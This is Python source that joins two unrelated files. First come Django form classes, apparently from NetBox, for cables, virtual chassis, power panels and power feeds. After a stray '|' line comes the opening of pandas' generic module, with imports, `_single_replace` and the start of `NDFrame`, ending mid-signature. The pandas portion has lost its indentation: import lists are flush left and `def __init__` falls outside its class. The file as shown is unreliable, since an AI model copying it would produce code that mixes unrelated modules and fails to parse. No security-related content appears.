class ConnectCableToRearPortForm(ConnectCableToDeviceForm):
    """Connect a cable to a RearPort on the B side."""
    termination_b_id = DynamicModelChoiceField(
        queryset=RearPort.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'device_id': '$termination_b_device'
        }
    )
class ConnectCableToCircuitTerminationForm(BootstrapMixin, CustomFieldModelForm):
    """Connect a cable to a CircuitTermination on the B side."""
    termination_b_provider = DynamicModelChoiceField(
        queryset=Provider.objects.all(),
        label='Provider',
        required=False
    )
    termination_b_region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        label='Region',
        required=False
    )
    termination_b_site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        label='Site',
        required=False,
        query_params={
            'region_id': '$termination_b_region'
        }
    )
    termination_b_circuit = DynamicModelChoiceField(
        queryset=Circuit.objects.all(),
        label='Circuit',
        display_field='cid',
        query_params={
            'provider_id': '$termination_b_provider',
            'site_id': '$termination_b_site',
        }
    )
    termination_b_id = DynamicModelChoiceField(
        queryset=CircuitTermination.objects.all(),
        label='Side',
        display_field='term_side',
        disabled_indicator='cable',
        query_params={
            'circuit_id': '$termination_b_circuit'
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = Cable
        fields = [
            'termination_b_provider', 'termination_b_region', 'termination_b_site', 'termination_b_circuit',
            'termination_b_id', 'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
        ]

    def clean_termination_b_id(self):
        # Return the PK rather than the object
        return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class ConnectCableToPowerFeedForm(BootstrapMixin, CustomFieldModelForm):
    """Connect a cable to a PowerFeed on the B side."""
    termination_b_region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        label='Region',
        required=False
    )
    termination_b_site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        label='Site',
        required=False,
        query_params={
            'region_id': '$termination_b_region'
        }
    )
    termination_b_rackgroup = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        label='Rack Group',
        required=False,
        display_field='cid',
        query_params={
            'site_id': '$termination_b_site'
        }
    )
    termination_b_powerpanel = DynamicModelChoiceField(
        queryset=PowerPanel.objects.all(),
        label='Power Panel',
        required=False,
        query_params={
            'site_id': '$termination_b_site',
            'rack_group_id': '$termination_b_rackgroup',
        }
    )
    termination_b_id = DynamicModelChoiceField(
        queryset=PowerFeed.objects.all(),
        label='Name',
        disabled_indicator='cable',
        query_params={
            'power_panel_id': '$termination_b_powerpanel'
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = Cable
        fields = [
            'termination_b_rackgroup', 'termination_b_powerpanel', 'termination_b_id', 'type', 'status', 'label',
            'color', 'length', 'length_unit', 'tags',
        ]

    def clean_termination_b_id(self):
        # Return the PK rather than the object
        return getattr(self.cleaned_data['termination_b_id'], 'pk', None)
class CableForm(BootstrapMixin, CustomFieldModelForm):
    """Create/edit form for a Cable's own attributes (terminations handled elsewhere)."""
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = Cable
        fields = [
            'type', 'status', 'label', 'color', 'length', 'length_unit', 'tags',
        ]
        widgets = {
            'status': StaticSelect2,
            'type': StaticSelect2,
            'length_unit': StaticSelect2,
        }
        error_messages = {
            'length': {
                'max_value': 'Maximum length is 32767 (any unit)'
            }
        }
class CableCSVForm(CustomFieldModelCSVForm):
    """CSV import form for Cable objects, resolving each termination from (device, type, name)."""

    # Termination A
    side_a_device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        help_text='Side A device'
    )
    side_a_type = CSVContentTypeField(
        queryset=ContentType.objects.all(),
        limit_choices_to=CABLE_TERMINATION_MODELS,
        help_text='Side A type'
    )
    side_a_name = forms.CharField(
        help_text='Side A component name'
    )

    # Termination B
    side_b_device = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        help_text='Side B device'
    )
    side_b_type = CSVContentTypeField(
        queryset=ContentType.objects.all(),
        limit_choices_to=CABLE_TERMINATION_MODELS,
        help_text='Side B type'
    )
    side_b_name = forms.CharField(
        help_text='Side B component name'
    )

    # Cable attributes
    status = CSVChoiceField(
        choices=CableStatusChoices,
        required=False,
        help_text='Connection status'
    )
    type = CSVChoiceField(
        choices=CableTypeChoices,
        required=False,
        help_text='Physical medium classification'
    )
    length_unit = CSVChoiceField(
        choices=CableLengthUnitChoices,
        required=False,
        help_text='Length unit'
    )

    class Meta:
        model = Cable
        fields = [
            'side_a_device', 'side_a_type', 'side_a_name', 'side_b_device', 'side_b_type', 'side_b_name', 'type',
            'status', 'label', 'color', 'length', 'length_unit',
        ]
        help_texts = {
            'color': mark_safe('RGB color in hexadecimal (e.g. <code>00ff00</code>)'),
        }

    def _clean_side(self, side):
        """
        Derive a Cable's A/B termination objects.

        :param side: 'a' or 'b'
        """
        # Fix: membership is checked against a tuple; the previous `side in 'ab'`
        # substring test also accepted '' and 'ab'.
        assert side in ('a', 'b'), f"Invalid side designation: {side}"

        device = self.cleaned_data.get(f'side_{side}_device')
        content_type = self.cleaned_data.get(f'side_{side}_type')
        name = self.cleaned_data.get(f'side_{side}_name')
        if not device or not content_type or not name:
            # Upstream field validation already failed; nothing to resolve
            return None

        model = content_type.model_class()
        try:
            termination_object = model.objects.get(device=device, name=name)
            if termination_object.cable is not None:
                raise forms.ValidationError(f"Side {side.upper()}: {device} {termination_object} is already connected")
        except ObjectDoesNotExist:
            raise forms.ValidationError(f"{side.upper()} side termination not found: {device} {name}")

        setattr(self.instance, f'termination_{side}', termination_object)
        return termination_object

    def clean_side_a_name(self):
        return self._clean_side('a')

    def clean_side_b_name(self):
        return self._clean_side('b')

    def clean_length_unit(self):
        # Avoid trying to save as NULL
        length_unit = self.cleaned_data.get('length_unit', None)
        return length_unit if length_unit is not None else ''
class CableBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk edit form for Cable objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Cable.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(CableTypeChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(CableStatusChoices),
        required=False,
        widget=StaticSelect2(),
        initial=''
    )
    label = forms.CharField(
        max_length=100,
        required=False
    )
    color = forms.CharField(
        max_length=6,  # RGB color code
        required=False,
        widget=ColorSelect()
    )
    length = forms.IntegerField(
        min_value=1,
        required=False
    )
    length_unit = forms.ChoiceField(
        choices=add_blank_choice(CableLengthUnitChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )

    class Meta:
        # Fields which may be cleared via bulk editing
        nullable_fields = [
            'type', 'status', 'label', 'color', 'length',
        ]

    def clean(self):
        super().clean()

        # Validate length/unit: a length value is meaningless without a unit
        length = self.cleaned_data.get('length')
        length_unit = self.cleaned_data.get('length_unit')
        if length and not length_unit:
            raise forms.ValidationError({
                'length_unit': "Must specify a unit when setting length"
            })
class CableFilterForm(BootstrapMixin, forms.Form):
    """Filter form for Cable objects."""
    model = Cable
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    tenant = DynamicModelMultipleChoiceField(
        queryset=Tenant.objects.all(),
        to_field_name='slug',
        required=False
    )
    rack_id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        label='Rack',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    type = forms.MultipleChoiceField(
        choices=add_blank_choice(CableTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    status = forms.ChoiceField(
        required=False,
        choices=add_blank_choice(CableStatusChoices),
        widget=StaticSelect2()
    )
    color = forms.CharField(
        max_length=6,  # RGB color code
        required=False,
        widget=ColorSelect()
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site',
            'tenant': '$tenant',
            'rack_id': '$rack_id',
        }
    )
    tag = TagFilterField(model)
#
# Connections
#
class ConsoleConnectionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the console connections list."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
class PowerConnectionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the power connections list (same fields as the console/interface variants)."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
class InterfaceConnectionFilterForm(BootstrapMixin, forms.Form):
    """Filter form for the interface connections list (same fields as the console/power variants)."""
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    device_id = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        label='Device',
        query_params={
            'site': '$site'
        }
    )
#
# Virtual chassis
#
class DeviceSelectionForm(forms.Form):
    """Hidden-input form carrying a set of selected Device PKs."""
    pk = forms.ModelMultipleChoiceField(
        queryset=Device.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
class VirtualChassisCreateForm(BootstrapMixin, CustomFieldModelForm):
    """Create form for a VirtualChassis, optionally assigning member devices on save."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        null_option='None',
        display_field='display_name',
        query_params={
            'site_id': '$site'
        }
    )
    members = DynamicModelMultipleChoiceField(
        queryset=Device.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'rack_id': '$rack',
        }
    )
    initial_position = forms.IntegerField(
        initial=1,
        required=False,
        help_text='Position of the first member device. Increases by one for each additional member.'
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = VirtualChassis
        fields = [
            'name', 'domain', 'region', 'site', 'rack', 'members', 'initial_position', 'tags',
        ]

    def save(self, *args, **kwargs):
        """Save the VirtualChassis, then attach members at sequential positions."""
        instance = super().save(*args, **kwargs)

        # Assign VC members (only once the instance has been committed to the database)
        if instance.pk:
            initial_position = self.cleaned_data.get('initial_position') or 1
            for i, member in enumerate(self.cleaned_data['members'], start=initial_position):
                member.virtual_chassis = instance
                member.vc_position = i
                member.save()

        return instance
class VirtualChassisForm(BootstrapMixin, CustomFieldModelForm):
    """Edit form for a VirtualChassis; master choices are limited to its own members."""
    master = forms.ModelChoiceField(
        queryset=Device.objects.all(),
        required=False,
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = VirtualChassis
        fields = [
            'name', 'domain', 'master', 'tags',
        ]
        widgets = {
            'master': SelectWithPK(),
        }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Only current members of this virtual chassis may be designated master
        self.fields['master'].queryset = Device.objects.filter(virtual_chassis=self.instance)
class BaseVCMemberFormSet(forms.BaseModelFormSet):
    """Formset which rejects duplicate vc_position values across member forms."""

    def clean(self):
        super().clean()

        # Check for duplicate VC position values
        seen_positions = []
        for member_form in self.forms:
            position = member_form.cleaned_data.get('vc_position')
            if not position:
                continue
            if position in seen_positions:
                member_form.add_error(
                    'vc_position',
                    'A virtual chassis member already exists in position {}.'.format(position)
                )
            seen_positions.append(position)
class DeviceVCMembershipForm(forms.ModelForm):
    """Per-member form assigning a Device's position/priority within a virtual chassis."""

    class Meta:
        model = Device
        fields = [
            'vc_position', 'vc_priority',
        ]
        labels = {
            'vc_position': 'Position',
            'vc_priority': 'Priority',
        }

    def __init__(self, validate_vc_position=False, *args, **kwargs):
        super().__init__(*args, **kwargs)

        # Require VC position (only required when the Device is a VirtualChassis member)
        self.fields['vc_position'].required = True

        # Validation of vc_position is optional. This is only required when adding a new member to an existing
        # VirtualChassis. Otherwise, vc_position validation is handled by BaseVCMemberFormSet.
        self.validate_vc_position = validate_vc_position

    def clean_vc_position(self):
        vc_position = self.cleaned_data['vc_position']

        if self.validate_vc_position:
            # Reject a position already occupied by another member of the same chassis
            conflicting_members = Device.objects.filter(
                virtual_chassis=self.instance.virtual_chassis,
                vc_position=vc_position
            )
            if conflicting_members.exists():
                raise forms.ValidationError(
                    'A virtual chassis member already exists in position {}.'.format(vc_position)
                )

        return vc_position
class VCMemberSelectForm(BootstrapMixin, forms.Form):
    """Form for choosing an unassigned device to add to a virtual chassis."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        null_option='None',
        display_field='display_name',
        query_params={
            'site_id': '$site'
        }
    )
    device = DynamicModelChoiceField(
        queryset=Device.objects.all(),
        display_field='display_name',
        query_params={
            'site_id': '$site',
            'rack_id': '$rack',
            'virtual_chassis_id': 'null',
        }
    )

    def clean_device(self):
        device = self.cleaned_data['device']
        # Server-side guard mirroring the 'virtual_chassis_id': 'null' query param above
        if device.virtual_chassis is not None:
            raise forms.ValidationError(
                f"Device {device} is already assigned to a virtual chassis."
            )
        return device
class VirtualChassisBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk edit form for VirtualChassis objects."""
    pk = forms.ModelMultipleChoiceField(
        queryset=VirtualChassis.objects.all(),
        widget=forms.MultipleHiddenInput()
    )
    domain = forms.CharField(
        max_length=30,
        required=False
    )

    class Meta:
        # Fields which may be cleared via bulk editing
        nullable_fields = ['domain']
class VirtualChassisCSVForm(CustomFieldModelCSVForm):
    """CSV import form for VirtualChassis objects."""
    master = CSVModelChoiceField(
        queryset=Device.objects.all(),
        to_field_name='name',
        required=False,
        help_text='Master device'
    )

    class Meta:
        model = VirtualChassis
        fields = VirtualChassis.csv_headers
class VirtualChassisFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """Filter form for VirtualChassis objects."""
    model = VirtualChassis
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    tenant_group = DynamicModelMultipleChoiceField(
        queryset=TenantGroup.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None'
    )
    tenant = DynamicModelMultipleChoiceField(
        queryset=Tenant.objects.all(),
        to_field_name='slug',
        required=False,
        null_option='None',
        query_params={
            'group': '$tenant_group'
        }
    )
    tag = TagFilterField(model)
#
# Power panels
#
class PowerPanelForm(BootstrapMixin, CustomFieldModelForm):
    """Create/edit form for a PowerPanel."""
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        query_params={
            'region_id': '$region'
        }
    )
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = PowerPanel
        fields = [
            'region', 'site', 'rack_group', 'name', 'tags',
        ]
class PowerPanelCSVForm(CustomFieldModelCSVForm):
    """CSV import form for PowerPanel objects."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Name of parent site'
    )
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        to_field_name='name'
    )

    class Meta:
        model = PowerPanel
        fields = PowerPanel.csv_headers

    def __init__(self, data=None, *args, **kwargs):
        # When bound, restrict rack_group choices to groups belonging to the
        # site named in the submitted row.
        super().__init__(data, *args, **kwargs)

        if data:

            # Limit group queryset by assigned site
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)
class PowerPanelBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """Bulk edit form for PowerPanel objects."""
    # Primary keys of the selected objects, carried as hidden inputs.
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerPanel.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    # Region is not stored on the model; it only scopes the site selector.
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites': '$site'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        query_params={
            'region_id': '$region'
        }
    )
    # Rack group choices are limited to the selected site.
    rack_group = DynamicModelChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        query_params={
            'site_id': '$site'
        }
    )

    class Meta:
        # Fields which may be set to empty ("nulled") during bulk edit.
        nullable_fields = ['rack_group']
class PowerPanelFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """Filter form for the PowerPanel list view."""
    model = PowerPanel
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    # Site choices are narrowed to the region(s) selected above.
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    # Filters by rack group primary key; scoped to the selected site(s).
    rack_group_id = DynamicModelMultipleChoiceField(
        queryset=RackGroup.objects.all(),
        required=False,
        label='Rack group (ID)',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    tag = TagFilterField(model)
#
# Power feeds
#
class PowerFeedForm(BootstrapMixin, CustomFieldModelForm):
    """Create/edit form for a PowerFeed."""
    # Region and site are not stored on the model; they only scope the
    # power_panel/rack selectors (initial_params back-fill them from an
    # already-assigned power panel).
    region = DynamicModelChoiceField(
        queryset=Region.objects.all(),
        required=False,
        initial_params={
            'sites__powerpanel': '$power_panel'
        }
    )
    site = DynamicModelChoiceField(
        queryset=Site.objects.all(),
        required=False,
        initial_params={
            'powerpanel': '$power_panel'
        },
        query_params={
            'region_id': '$region'
        }
    )
    power_panel = DynamicModelChoiceField(
        queryset=PowerPanel.objects.all(),
        query_params={
            'site_id': '$site'
        }
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        display_field='display_name',
        query_params={
            'site_id': '$site'
        }
    )
    comments = CommentField()
    tags = DynamicModelMultipleChoiceField(
        queryset=Tag.objects.all(),
        required=False
    )

    class Meta:
        model = PowerFeed
        fields = [
            'region', 'site', 'power_panel', 'rack', 'name', 'status', 'type', 'supply', 'phase', 'voltage', 'amperage',
            'max_utilization', 'comments', 'tags',
        ]
        widgets = {
            'status': StaticSelect2(),
            'type': StaticSelect2(),
            'supply': StaticSelect2(),
            'phase': StaticSelect2(),
        }
class PowerFeedCSVForm(CustomFieldModelCSVForm):
    """CSV import form for PowerFeed objects."""
    site = CSVModelChoiceField(
        queryset=Site.objects.all(),
        to_field_name='name',
        help_text='Assigned site'
    )
    power_panel = CSVModelChoiceField(
        queryset=PowerPanel.objects.all(),
        to_field_name='name',
        help_text='Upstream power panel'
    )
    # rack_group is used only to disambiguate the rack lookup below; it is
    # not a PowerFeed model field.
    rack_group = CSVModelChoiceField(
        queryset=RackGroup.objects.all(),
        to_field_name='name',
        required=False,
        help_text="Rack's group (if any)"
    )
    rack = CSVModelChoiceField(
        queryset=Rack.objects.all(),
        to_field_name='name',
        required=False,
        help_text='Rack'
    )
    status = CSVChoiceField(
        choices=PowerFeedStatusChoices,
        required=False,
        help_text='Operational status'
    )
    type = CSVChoiceField(
        choices=PowerFeedTypeChoices,
        required=False,
        help_text='Primary or redundant'
    )
    supply = CSVChoiceField(
        choices=PowerFeedSupplyChoices,
        required=False,
        help_text='Supply type (AC/DC)'
    )
    phase = CSVChoiceField(
        choices=PowerFeedPhaseChoices,
        required=False,
        help_text='Single or three-phase'
    )

    class Meta:
        model = PowerFeed
        fields = PowerFeed.csv_headers

    def __init__(self, data=None, *args, **kwargs):
        # When bound, restrict the related-object choices to those consistent
        # with the site (and rack group) named in the submitted row.
        super().__init__(data, *args, **kwargs)

        if data:

            # Limit power_panel queryset by site
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['power_panel'].queryset = self.fields['power_panel'].queryset.filter(**params)

            # Limit rack_group queryset by site
            params = {f"site__{self.fields['site'].to_field_name}": data.get('site')}
            self.fields['rack_group'].queryset = self.fields['rack_group'].queryset.filter(**params)

            # Limit rack queryset by site and group
            params = {
                f"site__{self.fields['site'].to_field_name}": data.get('site'),
                f"group__{self.fields['rack_group'].to_field_name}": data.get('rack_group'),
            }
            self.fields['rack'].queryset = self.fields['rack'].queryset.filter(**params)
class PowerFeedBulkEditForm(BootstrapMixin, AddRemoveTagsForm, CustomFieldBulkEditForm):
    """
    Bulk edit form for PowerFeed objects.

    Every field is optional: only values actually supplied are applied to the
    selected feeds. Fields listed in Meta.nullable_fields may instead be
    cleared in bulk.
    """
    # Primary keys of the selected objects, carried as hidden inputs.
    pk = forms.ModelMultipleChoiceField(
        queryset=PowerFeed.objects.all(),
        widget=forms.MultipleHiddenInput
    )
    power_panel = DynamicModelChoiceField(
        queryset=PowerPanel.objects.all(),
        required=False
    )
    rack = DynamicModelChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        display_field='display_name'
    )
    status = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedStatusChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedTypeChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    supply = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedSupplyChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    phase = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedPhaseChoices),
        required=False,
        initial='',
        widget=StaticSelect2()
    )
    voltage = forms.IntegerField(
        required=False
    )
    amperage = forms.IntegerField(
        required=False
    )
    max_utilization = forms.IntegerField(
        required=False
    )
    comments = CommentField(
        widget=SmallTextarea,
        label='Comments'
    )

    class Meta:
        # FIX: this previously listed 'rackgroup', which is not a field on
        # this form (no such field is declared above); the nullable optional
        # relation defined here is 'rack'. The stale name made it impossible
        # to clear a feed's rack assignment via bulk edit.
        nullable_fields = [
            'rack', 'comments',
        ]
class PowerFeedFilterForm(BootstrapMixin, CustomFieldFilterForm):
    """Filter form for the PowerFeed list view."""
    model = PowerFeed
    q = forms.CharField(
        required=False,
        label='Search'
    )
    region = DynamicModelMultipleChoiceField(
        queryset=Region.objects.all(),
        to_field_name='slug',
        required=False
    )
    # Site choices are narrowed to the region(s) selected above.
    site = DynamicModelMultipleChoiceField(
        queryset=Site.objects.all(),
        to_field_name='slug',
        required=False,
        query_params={
            'region': '$region'
        }
    )
    # Filters by power panel primary key; scoped to the selected site(s).
    power_panel_id = DynamicModelMultipleChoiceField(
        queryset=PowerPanel.objects.all(),
        required=False,
        label='Power panel',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    # Filters by rack primary key; scoped to the selected site(s).
    rack_id = DynamicModelMultipleChoiceField(
        queryset=Rack.objects.all(),
        required=False,
        label='Rack',
        null_option='None',
        query_params={
            'site': '$site'
        }
    )
    status = forms.MultipleChoiceField(
        choices=PowerFeedStatusChoices,
        required=False,
        widget=StaticSelect2Multiple()
    )
    type = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedTypeChoices),
        required=False,
        widget=StaticSelect2()
    )
    supply = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedSupplyChoices),
        required=False,
        widget=StaticSelect2()
    )
    phase = forms.ChoiceField(
        choices=add_blank_choice(PowerFeedPhaseChoices),
        required=False,
        widget=StaticSelect2()
    )
    voltage = forms.IntegerField(
        required=False
    )
    amperage = forms.IntegerField(
        required=False
    )
    max_utilization = forms.IntegerField(
        required=False
    )
    tag = TagFilterField(model)
|
import collections
from datetime import timedelta
import functools
import gc
import json
import operator
import pickle
import re
from textwrap import dedent
from typing import (
TYPE_CHECKING,
Any,
Callable,
Dict,
FrozenSet,
Hashable,
List,
Mapping,
Optional,
Sequence,
Set,
Tuple,
Type,
Union,
)
import warnings
import weakref
import numpy as np
from pandas._config import config
from pandas._libs import Timestamp, iNaT, lib
from pandas._typing import (
Axis,
FilePathOrBuffer,
FrameOrSeries,
JSONSerializable,
Label,
Level,
Renamer,
)
from pandas.compat import set_function_name
from pandas.compat._optional import import_optional_dependency
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
Appender,
Substitution,
doc,
rewrite_axis_style_signature,
)
from pandas.util._validators import (
validate_bool_kwarg,
validate_fillna_kwargs,
validate_percentile,
)
from pandas.core.dtypes.common import (
ensure_int64,
ensure_object,
ensure_str,
is_bool,
is_bool_dtype,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_dict_like,
is_extension_array_dtype,
is_float,
is_integer,
is_list_like,
is_number,
is_numeric_dtype,
is_object_dtype,
is_period_arraylike,
is_re_compilable,
is_scalar,
is_timedelta64_dtype,
pandas_dtype,
)
from pandas.core.dtypes.generic import ABCDataFrame, ABCSeries
from pandas.core.dtypes.inference import is_hashable
from pandas.core.dtypes.missing import isna, notna
import pandas as pd
from pandas.core import missing, nanops
import pandas.core.algorithms as algos
from pandas.core.base import PandasObject, SelectionMixin
import pandas.core.common as com
from pandas.core.construction import create_series_with_explicit_dtype
from pandas.core.indexes.api import (
Index,
InvalidIndexError,
MultiIndex,
RangeIndex,
ensure_index,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.period import Period, PeriodIndex
import pandas.core.indexing as indexing
from pandas.core.internals import BlockManager
from pandas.core.missing import find_valid_index
from pandas.core.ops import _align_method_FRAME
from pandas.io.formats import format as fmt
from pandas.io.formats.format import DataFrameFormatter, format_percentiles
from pandas.io.formats.printing import pprint_thing
from pandas.tseries.frequencies import to_offset
if TYPE_CHECKING:
    # Imported only for type checking to avoid a circular import at runtime.
    from pandas.core.resample import Resampler

# goal is to be able to define the docs close to function, while still being
# able to share
_shared_docs: Dict[str, str] = dict()
# Substitution values interpolated into the shared docstring templates.
_shared_doc_kwargs = dict(
    axes="keywords for axes",
    klass="Series/DataFrame",
    axes_single_arg="int or labels for object",
    args_transpose="axes to permute (int or label for object)",
    optional_by="""
        by : str or list of str
            Name or list of names to sort by""",
)
def _single_replace(self, to_replace, method, inplace, limit):
    """
    Replaces values in a Series using the fill method specified when no
    replacement value is given in the replace method
    """
    # Only 1-dimensional objects (Series) are supported here.
    if self.ndim != 1:
        raise TypeError(
            f"cannot replace {to_replace} with method {method} on a "
            f"{type(self).__name__}"
        )

    orig_dtype = self.dtype
    result = self if inplace else self.copy()
    fill_f = missing.get_fill_func(method)

    # Mask positions equal to ``to_replace`` and fill them from neighbouring
    # values according to ``method``, honouring ``limit``.
    mask = missing.mask_missing(result.values, to_replace)
    values = fill_f(result.values, limit=limit, mask=mask)

    if values.dtype == orig_dtype and inplace:
        # Filled in place with no dtype change: nothing more to do.
        return

    result = pd.Series(values, index=self.index, dtype=self.dtype).__finalize__(self)

    if inplace:
        self._update_inplace(result._data)
        return

    return result
bool_t = bool  # Need alias because NDFrame has def bool: (which shadows the builtin)
class NDFrame(PandasObject, SelectionMixin, indexing.IndexingMixin):
    """
    N-dimensional analogue of DataFrame. Store multi-dimensional in a
    size-mutable, labeled data structure

    Parameters
    ----------
    data : BlockManager
    axes : list
    copy : bool, default False
    """

    # Attribute names set directly on the instance (bypassing the
    # column-access machinery in __getattr__/__setattr__).
    _internal_names: List[str] = [
        "_data",
        "_cacher",
        "_item_cache",
        "_cache",
        "_is_copy",
        "_subtyp",
        "_name",
        "_index",
        "_default_kind",
        "_default_fill_value",
        "_metadata",
        "__array_struct__",
        "__array_interface__",
    ]
    # Set form of the list above, for O(1) membership tests.
    _internal_names_set: Set[str] = set(_internal_names)
    # Names of registered custom accessors.
    _accessors: Set[str] = set()
    _deprecations: FrozenSet[str] = frozenset(["get_values"])
    # Per-subclass metadata attribute names propagated by __finalize__.
    _metadata: List[str] = []
    _is_copy = None
    _data: BlockManager
    _attrs: Dict[Optional[Hashable], Any]
    _typ: str

    # ----------------------------------------------------------------------
    # Constructors
def __init__(
self,
data: BlockManager,
copy: bool = False,
attrs: Optional[Mapping[Optional[Hashable], Any]] = None,
